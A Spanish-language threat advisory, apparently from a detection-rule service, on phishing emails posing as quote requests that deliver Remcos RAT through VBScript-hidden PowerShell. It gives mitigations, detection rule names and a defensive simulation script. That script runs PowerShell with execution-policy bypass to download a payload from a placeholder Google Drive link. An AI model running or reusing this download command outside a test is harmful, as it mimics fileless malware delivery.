Correos Electrónicos de Solicitud de Cotización Falsos Utilizados en Ataques de Phishing con Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están distribuyendo correos electrónicos de phishing disfrazados como solicitudes de cotización de proyectos para entregar cargas maliciosas. La campaña utiliza VBScript para ocultar comandos de PowerShell, que en última instancia recuperan una carga útil de múltiples etapas y Remcos RAT. El malware final soporta la ejecución remota de comandos, registro de teclas y exfiltración de datos de sistemas comprometidos.
Investigación
El Centro de Inteligencia de Seguridad de AhnLab (ASEC) identificó una campaña de phishing en la que archivos comprimidos contienen VBScripts ocultos. Los investigadores descubrieron un método de ofuscación que abusa de notepad.exe para reconstruir el nombre ejecutable ‘powershell’ y depende de la sustitución de cadenas mediante tokens para los comandos de PowerShell. La carga útil de múltiples etapas también utiliza objetos COM para realizar la omisión de UAC.
Mitigación
Los usuarios deben validar el dominio del correo electrónico del remitente y tener cautela al abrir archivos adjuntos o hipervínculos inesperados. Las organizaciones deben configurar el filtrado de correos electrónicos para bloquear extensiones de archivos sospechosas como .vbs, .exe y .js. Los usuarios también deben evitar ingresar credenciales sensibles en URLs no oficiales o sospechosas recibidas a través de correos electrónicos no solicitados.
Respuesta
Cuando se detecta actividad maliciosa, verifique la legitimidad del correo electrónico original e investigue la actividad de archivos sospechosos dentro de %APPDATA%. Compruebe la ejecución no autorizada de PowerShell y los indicadores asociados con Remcos RAT. Aísle los sistemas comprometidos de la red para prevenir comunicación C2 adicional, actividad lateral y posible exfiltración de datos.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
LOLBAS WScript / CScript (via process_creation)
Posible Infiltración / Exfiltración de Datos / C2 mediante Servicios / Herramientas de Terceros (via dns_query)
Posible Infiltración / Exfiltración de Datos / C2 mediante Servicios / Herramientas de Terceros (via dns)
IOCs (HashMd5) para detectar: Malware de Phishing/Estafa: Cuidado con los correos electrónicos de phishing disfrazados como solicitudes de cotización
IOCs (SourceIP) para detectar: Malware de Phishing/Estafa: Cuidado con los correos electrónicos de phishing disfrazados como solicitudes de cotización
IOCs (DestinationIP) para detectar: Malware de Phishing/Estafa: Cuidado con los correos electrónicos de phishing disfrazados como solicitudes de cotización
Detectar Script de PowerShell Conectando al Servidor C2 [Conexión de Red de Windows]
Ejecución Maliciosa de PowerShell a través de Ofuscación de VBScript [Windows Powershell]
Ejecución de Simulación
-
Narrativa del Ataque & Comandos: Un atacante envía un correo electrónico de spearphishing que contiene un enlace a un documento. Cuando el usuario hace clic en el enlace, ejecuta un comando oculto de PowerShell diseñado para extraer un script malicioso de un repositorio de Google Drive. El atacante utiliza el
parámetro export=downloadpara asegurar que el archivo se descargue directamente en lugar de ser visto en un navegador. El objetivo es ejecutar una carga útil sin archivos en memoria para evadir antivirus basados en disco. El comando está construido para activar la regla de detección específica que apunta a este patrón de descarga. -
Script de Prueba de Regresión:
# Simulación de PowerShell descargando un archivo desde Google Drive vía patrón de URL específico $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J" Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Descargando carga útil...'; $data = Invoke-WebRequest -Uri '$targetUrl';`"" -
Comandos de Limpieza:
# No se escriben archivos en el disco en esta simulación específica, # pero detenemos el proceso si todavía está en ejecución. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue